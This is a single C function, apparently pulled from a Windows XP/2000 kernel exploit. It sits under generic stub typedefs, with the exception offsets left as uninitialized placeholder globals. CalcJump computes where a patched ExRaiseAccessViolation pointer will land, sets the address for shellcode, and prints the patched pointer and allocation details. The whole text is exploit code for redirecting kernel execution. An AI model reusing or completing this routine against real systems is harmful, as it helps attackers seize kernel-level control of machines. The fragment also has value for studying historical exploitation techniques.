
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int DWORD ;
typedef scalar_t__ BOOL ;


 int W2K_EXCEPTION ;
 int WXP_EXCEPTION ;
 int printf (char*,...) ;

DWORD CalcJump(DWORD BaseNt,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{

      DWORD SumTemp,IniAddress,i,sumAux,addTemp,OffWord;

   if(InXP)
   {
  SumTemp=BaseNt+WXP_EXCEPTION+0xE;
     OffWord=0x64B8;
   }
   else
   {
     SumTemp=BaseNt+W2K_EXCEPTION+0xE;
  OffWord=0x5358;
   }


   for(i=0x4c;i<0xDDDC;i=i+4)
   {
  sumAux=~((i*0x10000)+OffWord);
  addTemp=SumTemp-sumAux;
  if(addTemp>0xE000000 && addTemp<0xF000000){
    IniAddress=addTemp&0xFFFFF000;
    *hValue=i-4;
    *ShellAddr=addTemp;
    break;
  }
   }
   printf("\nINFORMATION \n");
   printf("-----------------------------------------------------\n");
      printf("Patched ExRaiseAccessViolation pointing to \t [0x%p]\n",addTemp-1);
      printf("0xF000h bytes allocated  at \t\t [0x%p]\n",IniAddress);
      printf("Magic Value\t\t\t	 [0x%p]\n\n",i-4);

      return (IniAddress);
}
